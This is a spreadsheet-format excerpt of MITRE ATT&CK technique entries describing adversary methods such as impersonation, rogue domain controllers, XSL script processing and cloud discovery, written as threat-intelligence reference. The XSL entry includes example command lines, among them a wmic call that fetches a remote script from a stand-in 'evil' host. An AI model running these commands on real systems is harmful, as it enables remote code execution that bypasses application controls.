    <t>Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as firewalls and anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may also span both native defenses as well as supplemental capabilities installed by users and administrators.
Adversaries may also impair routine operations that contribute to defensive hygiene, such as blocking users from logging out of a computer or stopping it from being shut down. These restrictions can further enable malicious operations as well as the continued propagation of incidents.(Citation: Emotet shutdown)
Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components.</t>
  </si>
  <si>
    <t>T1656</t>
  </si>
  <si>
    <t>Impersonation</t>
  </si>
  <si>
    <t>Adversaries may impersonate a trusted person or organization in order to persuade and trick a target into performing some action on their behalf. For example, adversaries may communicate with victims (via [Phishing for Information](https://attack.mitre.org/techniques/T1598), [Phishing](https://attack.mitre.org/techniques/T1566), or [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)) while impersonating a known sender such as an executive, colleague, or third-party vendor. Established trust can then be leveraged to accomplish an adversary’s ultimate goals, possibly against multiple victims. 
In many cases of business email compromise or email fraud campaigns, adversaries use impersonation to defraud victims -- deceiving them into sending money or divulging information that ultimately enables [Financial Theft](https://attack.mitre.org/techniques/T1657).
Adversaries will often also use social engineering techniques such as manipulative and persuasive language in email subject lines and body text such as `payment`, `request`, or `urgent` to push the victim to act quickly before malicious activity is detected. These campaigns are often specifically targeted against people who, due to job roles and/or accesses, can carry out the adversary’s goal.   
Impersonation is typically preceded by reconnaissance techniques such as [Gather Victim Identity Information](https://attack.mitre.org/techniques/T1589) and [Gather Victim Org Information](https://attack.mitre.org/techniques/T1591) as well as acquiring infrastructure such as email domains (i.e. [Domains](https://attack.mitre.org/techniques/T1583/001)) to substantiate their false identity.(Citation: CrowdStrike-BEC)
There is the potential for multiple victims in campaigns involving impersonation. For example, an adversary may [Compromise Accounts](https://attack.mitre.org/techniques/T1586) targeting one organization which can then be used to support impersonation against other entities.(Citation: VEC)</t>
  </si>
  <si>
    <t>T1202</t>
  </si>
  <si>
    <t>Indirect Command Execution</t>
  </si>
  <si>
    <t>Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts. (Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017)
Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.</t>
  </si>
  <si>
    <t>T1578</t>
  </si>
  <si>
    <t>Modify Cloud Compute Infrastructure</t>
  </si>
  <si>
    <t>An adversary may attempt to modify a cloud account's compute service infrastructure to evade defenses. A modification to the compute service infrastructure can include the creation, deletion, or modification of one or more components such as compute instances, virtual machines, and snapshots.
Permissions gained from the modification of infrastructure components may bypass restrictions that prevent access to existing infrastructure. Modifying infrastructure components may also allow an adversary to evade detection and remove evidence of their presence.(Citation: Mandiant M-Trends 2020)</t>
  </si>
  <si>
    <t>T1601</t>
  </si>
  <si>
    <t>Modify System Image</t>
  </si>
  <si>
    <t>Adversaries may make changes to the operating system of embedded network devices to weaken defenses and provide new capabilities for themselves.  On such devices, the operating systems are typically monolithic and most of the device functionality and capabilities are contained within a single file.
To change the operating system, the adversary typically only needs to affect this one file, replacing or modifying it.  This can either be done live in memory during system runtime for immediate effect, or in storage to implement the change on the next boot of the network device.</t>
  </si>
  <si>
    <t>T1207</t>
  </si>
  <si>
    <t>Rogue Domain Controller</t>
  </si>
  <si>
    <t>Adversaries may register a rogue Domain Controller to enable manipulation of Active Directory data. DCShadow may be used to create a rogue Domain Controller (DC). DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a DC. (Citation: DCShadow Blog) Once registered, a rogue DC may be able to inject and replicate changes into AD infrastructure for any domain object, including credentials and keys.
Registering a rogue DC involves creating a new server and nTDSDSA objects in the Configuration partition of the AD schema, which requires Administrator privileges (either Domain or local to the DC) or the KRBTGT hash. (Citation: Adsecurity Mimikatz Guide)
This technique may bypass system logging and security monitors such as security information and event management (SIEM) products (since actions taken on a rogue DC may not be reported to these sensors). (Citation: DCShadow Blog) The technique may also be used to alter and delete replication and other associated metadata to obstruct forensic analysis. Adversaries may also utilize this technique to perform [SID-History Injection](https://attack.mitre.org/techniques/T1134/005) and/or manipulate AD objects (such as accounts, access control lists, schemas) to establish backdoors for Persistence. (Citation: DCShadow Blog)</t>
  </si>
  <si>
    <t>T1553</t>
  </si>
  <si>
    <t>Subvert Trust Controls</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may undermine security controls that will either warn users of untrusted activity or prevent execution of untrusted programs. Operating systems and security products may contain mechanisms to identify programs or websites as possessing some level of trust. Examples of such features would include a program being allowed to run because it is signed by a valid code signing certificate, a program prompting the user with a warning because it has an attribute set from being downloaded from the Internet, or getting an indication that you are about to connect to an untrusted site.
Adversaries may attempt to subvert these trust mechanisms. The method adversaries use will depend on the specific mechanism they seek to subvert. Adversaries may conduct [File and Directory Permissions Modification](https://attack.mitre.org/techniques/T1222) or [Modify Registry](https://attack.mitre.org/techniques/T1112) in support of subverting these controls.(Citation: SpectorOps Subverting Trust Sept 2017) Adversaries may also create or steal code signing certificates to acquire trust on target systems.(Citation: Securelist Digital Certificates)(Citation: Symantec Digital Certificates) </t>
  </si>
  <si>
    <t>T1218</t>
  </si>
  <si>
    <t>System Binary Proxy Execution</t>
  </si>
  <si>
    <t>Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed, or otherwise trusted, binaries. Binaries used in this technique are often Microsoft-signed files, indicating that they have been either downloaded from Microsoft or are already native in the operating system.(Citation: LOLBAS Project) Binaries signed with trusted digital certificates can typically execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files or commands.
Similarly, on Linux systems adversaries may abuse trusted binaries such as &lt;code&gt;split&lt;/code&gt; to proxy execution of malicious commands.(Citation: split man page)(Citation: GTFO split)</t>
  </si>
  <si>
    <t>T1216</t>
  </si>
  <si>
    <t>System Script Proxy Execution</t>
  </si>
  <si>
    <t>Adversaries may use trusted scripts, often signed with certificates, to proxy the execution of malicious files. Several Microsoft signed scripts that have been downloaded from Microsoft or are default on Windows installations can be used to proxy execution of other files.(Citation: LOLBAS Project) This behavior may be abused by adversaries to execute malicious files that could bypass application control and signature validation on systems.(Citation: GitHub Ultimate AppLocker Bypass List)</t>
  </si>
  <si>
    <t>T1535</t>
  </si>
  <si>
    <t>Unused/Unsupported Cloud Regions</t>
  </si>
  <si>
    <t>Adversaries may create cloud instances in unused geographic service regions in order to evade detection. Access is usually obtained through compromising accounts used to manage cloud infrastructure.
Cloud service providers often provide infrastructure throughout the world in order to improve performance, provide redundancy, and allow customers to meet compliance requirements. Oftentimes, a customer will only use a subset of the available regions and may not actively monitor other regions. If an adversary creates resources in an unused region, they may be able to operate undetected.
A variation on this behavior takes advantage of differences in functionality across cloud regions. An adversary could utilize regions which do not support advanced detection services in order to avoid detection of their activity.
An example of adversary use of unused AWS regions is to mine cryptocurrency through [Resource Hijacking](https://attack.mitre.org/techniques/T1496), which can cost organizations substantial amounts of money over time depending on the processing power used.(Citation: CloudSploit - Unused AWS Regions)</t>
  </si>
  <si>
    <t>T1220</t>
  </si>
  <si>
    <t>XSL Script Processing</t>
  </si>
  <si>
    <t>Adversaries may bypass application control and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. To support complex operations, the XSL standard includes support for embedded scripting in various languages. (Citation: Microsoft XSLT Script Mar 2017)
Adversaries may abuse this functionality to execute arbitrary files while potentially bypassing application control. Similar to [Trusted Developer Utilities Proxy Execution](https://attack.mitre.org/techniques/T1127), the Microsoft common line transformation utility binary (msxsl.exe) (Citation: Microsoft msxsl.exe) can be installed and used to execute malicious JavaScript embedded within local or remote (URL referenced) XSL files. (Citation: Penetration Testing Lab MSXSL July 2017) Since msxsl.exe is not installed by default, an adversary will likely need to package it with dropped files. (Citation: Reaqta MSXSL Spearphishing MAR 2018) Msxsl.exe takes two main arguments, an XML source file and an XSL stylesheet. Since the XSL file is valid XML, the adversary may call the same XSL file twice. When using msxsl.exe adversaries may also give the XML/XSL files an arbitrary file extension.(Citation: XSL Bypass Mar 2019)
Command-line examples:(Citation: Penetration Testing Lab MSXSL July 2017)(Citation: XSL Bypass Mar 2019)
* &lt;code&gt;msxsl.exe customers[.]xml script[.]xsl&lt;/code&gt;
* &lt;code&gt;msxsl.exe script[.]xsl script[.]xsl&lt;/code&gt;
* &lt;code&gt;msxsl.exe script[.]jpeg script[.]jpeg&lt;/code&gt;
Another variation of this technique, dubbed “Squiblytwo”, involves using [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) to invoke JScript or VBScript within an XSL file.(Citation: LOLBAS Wmic) This technique can also execute local/remote scripts and, similar to its [Regsvr32](https://attack.mitre.org/techniques/T1218/010)/ "Squiblydoo" counterpart, leverages a trusted, built-in Windows tool. Adversaries may abuse any alias in [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) provided they utilize the /FORMAT switch.(Citation: XSL Bypass Mar 2019)
Command-line examples:(Citation: XSL Bypass Mar 2019)(Citation: LOLBAS Wmic)
* Local File: &lt;code&gt;wmic process list /FORMAT:evil[.]xsl&lt;/code&gt;
* Remote File: &lt;code&gt;wmic os get /FORMAT:”https[:]//example[.]com/evil[.]xsl”&lt;/code&gt;</t>
  </si>
  <si>
    <t>T1010</t>
  </si>
  <si>
    <t>Application Window Discovery</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used.(Citation: Prevailion DarkWatchman 2021) For example, information about application windows could be used identify potential data to collect as well as identifying security tooling ([Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) to evade.(Citation: ESET Grandoreiro April 2020)
Adversaries typically abuse system features for this type of enumeration. For example, they may gather information through native system features such as [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) commands and [Native API](https://attack.mitre.org/techniques/T1106) functions.</t>
  </si>
  <si>
    <t>T1580</t>
  </si>
  <si>
    <t>Cloud Infrastructure Discovery</t>
  </si>
  <si>
    <t>An adversary may attempt to discover infrastructure and resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.
Cloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a &lt;code&gt;DescribeInstances&lt;/code&gt; API within the Amazon EC2 API that can return information about one or more instances within an account, the &lt;code&gt;ListBuckets&lt;/code&gt; API that returns a list of all buckets owned by the authenticated sender of the request, the &lt;code&gt;HeadBucket&lt;/code&gt; API to determine a bucket’s existence along with access permissions of the request sender, or the &lt;code&gt;GetPublicAccessBlock&lt;/code&gt; API to retrieve access block configuration for a bucket.(Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API)(Citation: AWS Get Public Access Block)(Citation: AWS Head Bucket) Similarly, GCP's Cloud SDK CLI provides the &lt;code&gt;gcloud compute instances list&lt;/code&gt; command to list all Google Compute Engine instances in a project (Citation: Google Compute Instances), and Azure's CLI command &lt;code&gt;az vm list&lt;/code&gt; lists details of virtual machines.(Citation: Microsoft AZ CLI) In addition to API commands, adversaries can utilize open source tools to discover cloud storage infrastructure through [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003).(Citation: Malwarebytes OSINT Leaky Buckets - Hioureas)
An adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020)An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries have also may use infrastructure discovery APIs such as &lt;code&gt;DescribeDBInstances&lt;/code&gt; to determine size, owner, permissions, and network ACLs of database resources. (Citation: AWS Describe DB Instances) Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves.</t>
  </si>
  <si>
    <t>T1538</t>
  </si>
  <si>
    <t>Cloud Service Dashboard</t>
  </si>
  <si>
    <t>An adversary may use a cloud service dashboard GUI with stolen credentials to gain useful information from an operational cloud environment, such as specific services, resources, and features. For example, the GCP Command Center can be used to view all assets, findings of potential security risks, and to run additional queries, such as finding public IP addresses and open ports.(Citation: Google Command Center Dashboard)
Depending on the configuration of the environment, an adversary may be able to enumerate more information via the graphical dashboard than an API. This allows the adversary to gain information without making any API requests.</t>
  </si>
  <si>
    <t>T1526</t>
  </si>
  <si>
    <t>Cloud Service Discovery</t>
  </si>
  <si>
    <t>An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Azure AD, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs.
Adversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Azure AD Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API)
For example, Stormspotter is an open source tool for enumerating and constructing a graph for Azure resources and services, and Pacu is an open source AWS exploitation framework that supports several methods for discovering cloud services.(Citation: Azure - Stormspotter)(Citation: GitHub Pacu)
Adversaries may use the information gained to shape follow-on behaviors, such as targeting data or credentials from enumerated services or evading identified defenses through [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001) or [Disable or Modify Cloud Logs](https://attack.mitre.org/techniques/T1562/008).</t>
  </si>
  <si>
    <t>T1619</t>
  </si>
  <si>
    <t>Cloud Storage Object Discovery</t>
  </si>
  <si>
    <t>Adversaries may enumerate objects in cloud storage infrastructure. Adversaries may use this information during automated discovery to shape follow-on behaviors, including requesting all or specific objects from cloud storage.  Similar to [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) on a local host, after identifying available storage services (i.e. [Cloud Infrastructure Discovery](https://attack.mitre.org/techniques/T1580)) adversaries may access the contents/objects stored in cloud infrastructure.
Cloud service providers offer APIs allowing users to enumerate objects stored within cloud storage. Examples include ListObjectsV2 in AWS (Citation: ListObjectsV2) and List Blobs in Azure(Citation: List Blobs) .</t>
  </si>
  <si>
    <t>T1613</t>
  </si>
  <si>
    <t>Container and Resource Discovery</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may attempt to discover containers and other resources that are available within a containers environment. Other resources may include images, deployments, pods, nodes, and other information such as the status of a cluster.
These resources can be viewed within web applications such as the Kubernetes dashboard or can be queried via the Docker and Kubernetes APIs.(Citation: Docker API)(Citation: Kubernetes API) In Docker, logs may leak information about the environment, such as the environment’s configuration, which services are available, and what cloud provider the victim may be utilizing. The discovery of these resources may inform an adversary’s next steps in the environment, such as how to perform lateral movement and which methods to utilize for execution. </t>
  </si>
  <si>
    <t>T1652</t>
  </si>
  <si>
    <t>Device Driver Discovery</t>
  </si>
  <si>
    <t>Adversaries may attempt to enumerate local device drivers on a victim host. Information about device drivers may highlight various insights that shape follow-on behaviors, such as the function/purpose of the host, present security tools (i.e. [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) or other defenses (e.g., [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497)), as well as potential exploitable vulnerabilities (e.g., [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)).
Many OS utilities may provide information about local device drivers, such as `driverquery.exe` and the `EnumDeviceDrivers()` API function on Windows.(Citation: Microsoft Driverquery)(Citation: Microsoft EnumDeviceDrivers) Information about device drivers (as well as associated services, i.e., [System Service Discovery](https://attack.mitre.org/techniques/T1007)) may also be available in the Registry.(Citation: Microsoft Registry Drivers)
On Linux/macOS, device drivers (in the form of kernel modules) may be visible within `/dev` or using utilities such as `lsmod` and `modinfo`.(Citation: Linux Kernel Programming)(Citation: lsmod man)(Citation: modinfo man)</t>
  </si>
  <si>
    <t>T1482</t>
  </si>
  <si>
    <t>Domain Trust Discovery</t>
  </si>
  <si>
    <t>Adversaries may attempt to gather information on domain trust relationships that may be used to identify lateral movement opportunities in Windows multi-domain/forest environments. Domain trusts provide a mechanism for a domain to allow access to resources based on the authentication procedures of another domain.(Citation: Microsoft Trusts) Domain trusts allow the users of the trusted domain to access resources in the trusting domain. The information discovered may help the adversary conduct [SID-History Injection](https://attack.mitre.org/techniques/T1134/005), [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003), and [Kerberoasting](https://attack.mitre.org/techniques/T1558/003).(Citation: AdSecurity Forging Trust Tickets)(Citation: Harmj0y Domain Trusts) Domain trusts can be enumerated using the `DSEnumerateDomainTrusts()` Win32 API call, .NET methods, and LDAP.(Citation: Harmj0y Domain Trusts) The Windows utility [Nltest](https://attack.mitre.org/software/S0359) is known to be used by adversaries to enumerate domain trusts.(Citation: Microsoft Operation Wilysupply)</t>
  </si>
  <si>
    <t>T1654</t>
  </si>
  <si>
    <t>Log Enumeration</t>
  </si>
  <si>
    <t>Adversaries may enumerate system and service logs to find useful data. These logs may highlight various types of valuable insights for an adversary, such as user authentication records ([Account Discovery](https://attack.mitre.org/techniques/T1087)), security or vulnerable software ([Software Discovery](https://attack.mitre.org/techniques/T1518)), or hosts within a compromised network ([Remote System Discovery](https://attack.mitre.org/techniques/T1018)).
Host binaries may be leveraged to collect system logs. Examples include using `wevtutil.exe` or [PowerShell](https://attack.mitre.org/techniques/T1059/001) on Windows to access and/or export security event information.(Citation: WithSecure Lazarus-NoPineapple Threat Intel Report 2023)(Citation: Cadet Blizzard emerges as novel threat actor) In cloud environments, adversaries may leverage utilities such as the Azure VM Agent’s `CollectGuestLogs.exe` to collect security logs from cloud hosted infrastructure.(Citation: SIM Swapping and Abuse of the Microsoft Azure Serial Console)
Adversaries may also target centralized logging infrastructure such as SIEMs. Logs may also be bulk exported and sent to adversary-controlled infrastructure for offline analysis.</t>
  </si>
  <si>
    <t>T1201</t>
  </si>
  <si>
    <t>Password Policy Discovery</t>
  </si>
  <si>
    <t>Adversaries may attempt to access detailed information about the password policy used within an enterprise network or cloud environment. Password policies are a way to enforce complex passwords that are difficult to guess or crack through [Brute Force](https://attack.mitre.org/techniques/T1110). This information may help the adversary to create a list of common passwords and launch dictionary and/or brute force attacks which adheres to the policy (e.g. if the minimum password length should be 8, then not trying passwords such as 'pass123'; not checking for more than 3-4 passwords per account if the lockout is set to 6 as to not lock out accounts).
Password policies can be set and discovered on Windows, Linux, and macOS systems via various command shell utilities such as &lt;code&gt;net accounts (/domain)&lt;/code&gt;, &lt;code&gt;Get-ADDefaultDomainPasswordPolicy&lt;/code&gt;, &lt;code&gt;chage -l &lt;username&gt;&lt;/code&gt;, &lt;code&gt;cat /etc/pam.d/common-password&lt;/code&gt;, and &lt;code&gt;pwpolicy getaccountpolicies&lt;/code&gt; (Citation: Superuser Linux Password Policies) (Citation: Jamf User Password Policies). Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to discover password policy information (e.g. &lt;code&gt;show aaa&lt;/code&gt;, &lt;code&gt;show aaa common-criteria policy all&lt;/code&gt;).(Citation: US-CERT-TA18-106A)
Password policies can be discovered in cloud environments using available APIs such as &lt;code&gt;GetAccountPasswordPolicy&lt;/code&gt; in AWS (Citation: AWS GetPasswordPolicy).</t>
  </si>
  <si>
    <t>T1518</t>
  </si>
  <si>
    <t>Software Discovery</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of software and software versions that are installed on a system or in a cloud environment. Adversaries may use the information from [Software Discovery](https://attack.mitre.org/techniques/T1518) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable to [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).</t>
  </si>
  <si>
    <t>T1651</t>
  </si>
  <si>
    <t>Cloud Administration Command</t>
  </si>
  <si>
    <t>Adversaries may abuse cloud management services to execute commands within virtual machines or hybrid-joined devices. Resources such as AWS Systems Manager, Azure RunCommand, and Runbooks allow users to remotely run scripts in virtual machines by leveraging installed virtual machine agents. Similarly, in Azure AD environments, Microsoft Endpoint Manager allows Global or Intune Administrators to run scripts as SYSTEM on on-premises devices joined to the Azure AD.(Citation: AWS Systems Manager Run Command)(Citation: Microsoft Run Command)(Citation: SpecterOps Lateral Movement from Azure to On-Prem AD 2020)
If an adversary gains administrative access to a cloud environment, they may be able to abuse cloud management services to execute commands in the environment’s virtual machines or on-premises hybrid-joined devices. Additionally, an adversary that compromises a service provider or delegated administrator account may similarly be able to leverage a [Trusted Relationship](https://attack.mitre.org/techniques/T1199) to execute commands in connected virtual machines.(Citation: MSTIC Nobelium Oct 2021)</t>
  </si>
  <si>
    <t>T1059</t>
  </si>
  <si>
    <t>Command and Scripting Interpreter</t>
  </si>
  <si>
    <t>Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of [Unix Shell](https://attack.mitre.org/techniques/T1059/004) while Windows installations include the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
There are also cross-platform interpreters such as [Python](https://attack.mitre.org/techniques/T1059/006), as well as those commonly associated with client applications such as [JavaScript](https://attack.mitre.org/techniques/T1059/007) and [Visual Basic](https://attack.mitre.org/techniques/T1059/005).
Adversaries may abuse these technologies in various ways as a means of executing arbitrary commands. Commands and scripts can be embedded in [Initial Access](https://attack.mitre.org/tactics/TA0001) payloads delivered to victims as lure documents or as secondary payloads downloaded from an existing C2. Adversaries may also execute commands through interactive terminals/shells, as well as utilize various [Remote Services](https://attack.mitre.org/techniques/T1021) in order to achieve remote Execution.(Citation: Powershell Remote Commands)(Citation: Cisco IOS Software Integrity Assurance - Command History)(Citation: Remote Shell Execution in Python)</t>
  </si>
  <si>
    <t>T1609</t>
  </si>
  <si>
    <t>Container Administration Command</t>
  </si>
  <si>
    <t>Adversaries may abuse a container administration service to execute commands within a container. A container administration service such as the Docker daemon, the Kubernetes API server, or the kubelet may allow remote management of containers within an environment.(Citation: Docker Daemon CLI)(Citation: Kubernetes API)(Citation: Kubernetes Kubelet)
In Docker, adversaries may specify an entrypoint during container deployment that executes a script or command, or they may use a command such as &lt;code&gt;docker exec&lt;/code&gt; to execute a command within a running container.(Citation: Docker Entrypoint)(Citation: Docker Exec) In Kubernetes, if an adversary has sufficient permissions, they may gain remote execution in a container in the cluster via interaction with the Kubernetes API server, the kubelet, or by running a command such as &lt;code&gt;kubectl exec&lt;/code&gt;.(Citation: Kubectl Exec Get Shell)</t>
  </si>
  <si>
    <t>T1203</t>
  </si>
  <si>
    <t>Exploitation for Client Execution</t>
  </si>
  <si>
    <t>Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Several types exist:
### Browser-based Exploitation
Web browsers are a common target through [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) and [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002). Endpoint systems may be compromised through normal web browsing or from certain users being targeted by links in spearphishing emails to adversary controlled sites used to exploit the web browser. These often do not require an action by the user for the exploit to be executed.
### Office Applications
Common office and productivity applications such as Microsoft Office are also targeted through [Phishing](https://attack.mitre.org/techniques/T1566). Malicious files will be transmitted directly as attachments or through links to download them. These require the user to open the document or file for the exploit to run.
### Common Third-party Applications
Other applications that are commonly seen or are part of the software deployed in a target network may also be used for exploitation. Applications such as Adobe Reader and Flash, which are common in enterprise environments, have been routinely targeted by adversaries attempting to gain access to systems. Depending on the software and nature of the vulnerability, some may be exploited in the browser or require the user to open a file. For instance, some Flash exploits have been delivered as objects within Microsoft Office documents.</t>
  </si>
  <si>
    <t>T1559</t>
  </si>
  <si>
    <t>Inter-Process Communication</t>
  </si>
  <si>
    <t>Adversaries may abuse inter-process communication (IPC) mechanisms for local code or command execution. IPC is typically used by processes to share data, communicate with each other, or synchronize execution. IPC is also commonly used to avoid situations such as deadlocks, which occurs when processes are stuck in a cyclic waiting pattern. 
Adversaries may abuse IPC to execute arbitrary code or commands. IPC mechanisms may differ depending on OS, but typically exists in a form accessible through programming languages/libraries or native interfaces such as Windows [Dynamic Data Exchange](https://attack.mitre.org/techniques/T1559/002) or [Component Object Model](https://attack.mitre.org/techniques/T1559/001). Linux environments support several different IPC mechanisms, two of which being sockets and pipes.(Citation: Linux IPC) Higher level execution mediums, such as those of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)s, may also leverage underlying IPC mechanisms. Adversaries may also use [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) to facilitate remote IPC execution.(Citation: Fireeye Hunting COM June 2019)</t>
  </si>
  <si>
    <t>T1106</t>
  </si>
  <si>
    <t>Native API</t>
  </si>
  <si>
    <t>Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Adversaries may abuse these OS API functions as a means of executing behaviors. Similar to [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), the native API and its hierarchy of interfaces provide mechanisms to interact with and utilize various components of a victimized system.
Native API functions (such as &lt;code&gt;NtCreateProcess&lt;/code&gt;) may be directed invoked via system calls / syscalls, but these features are also often exposed to user-mode applications via interfaces and libraries.(Citation: OutFlank System Calls)(Citation: CyberBit System Calls)(Citation: MDSec System Calls) For example, functions such as the Windows API &lt;code&gt;CreateProcess()&lt;/code&gt; or GNU &lt;code&gt;fork()&lt;/code&gt; will allow programs and scripts to start other processes.(Citation: Microsoft CreateProcess)(Citation: GNU Fork) This may allow API callers to execute a binary, run a CLI command, load modules, etc. as thousands of similar API functions exist for various system operations.(Citation: Microsoft Win32)(Citation: LIBC)(Citation: GLIBC)
Higher level software frameworks, such as Microsoft .NET and macOS Cocoa, are also available to interact with native APIs. These frameworks typically provide language wrappers/abstractions to API functionalities and are designed for ease-of-use/portability of code.(Citation: Microsoft NET)(Citation: Apple Core Services)(Citation: MACOS Cocoa)(Citation: macOS Foundation)
Adversaries may use assembly to directly or in-directly invoke syscalls in an attempt to subvert defensive sensors and detection signatures such as user mode API-hooks.(Citation: Redops Syscalls) Adversaries may also attempt to tamper with sensors and defensive tools associated with API monitoring, such as unhooking monitored functions via [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001).</t>
  </si>
  <si>
    <t>T1648</t>
  </si>
  <si>
    <t>Serverless Execution</t>
  </si>
  <si>
    <t>Adversaries may abuse serverless computing, integration, and automation services to execute arbitrary code in cloud environments. Many cloud providers offer a variety of serverless resources, including compute engines, application integration services, and web servers. 
Adversaries may abuse these resources in various ways as a means of executing arbitrary commands. For example, adversaries may use serverless functions to execute malicious code, such as crypto-mining malware (i.e. [Resource Hijacking](https://attack.mitre.org/techniques/T1496)).(Citation: Cado Security Denonia) Adversaries may also create functions that enable further compromise of the cloud environment. For example, an adversary may use the `IAM:PassRole` permission in AWS or the `iam.serviceAccounts.actAs` permission in Google Cloud to add [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003) to a serverless cloud function, which may then be able to perform actions the original user cannot.(Citation: Rhino Security Labs AWS Privilege Escalation)(Citation: Rhingo Security Labs GCP Privilege Escalation)
Serverless functions can also be invoked in response to cloud events (i.e. [Event Triggered Execution](https://attack.mitre.org/techniques/T1546)), potentially enabling persistent execution over time. For example, in AWS environments, an adversary may create a Lambda function that automatically adds [Additional Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) to a user and a corresponding CloudWatch events rule that invokes that function whenever a new user is created.(Citation: Backdooring an AWS account) Similarly, an adversary may create a Power Automate workflow in Office 365 environments that forwards all emails a user receives or creates anonymous sharing links whenever a user is granted access to a document in SharePoint.(Citation: Varonis Power Automate Data Exfiltration)(Citation: Microsoft DART Case Report 001)</t>
  </si>
  <si>
    <t>T1129</t>
  </si>
  <si>
    <t>Shared Modules</t>
  </si>
  <si>
    <t>Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., [Native API](https://attack.mitre.org/techniques/T1106)).
Adversaries may use this functionality as a way to execute arbitrary payloads on a victim system. For example, adversaries can modularize functionality of their malware into shared objects that perform various functions such as managing C2 network communications or execution of specific actions on objective.
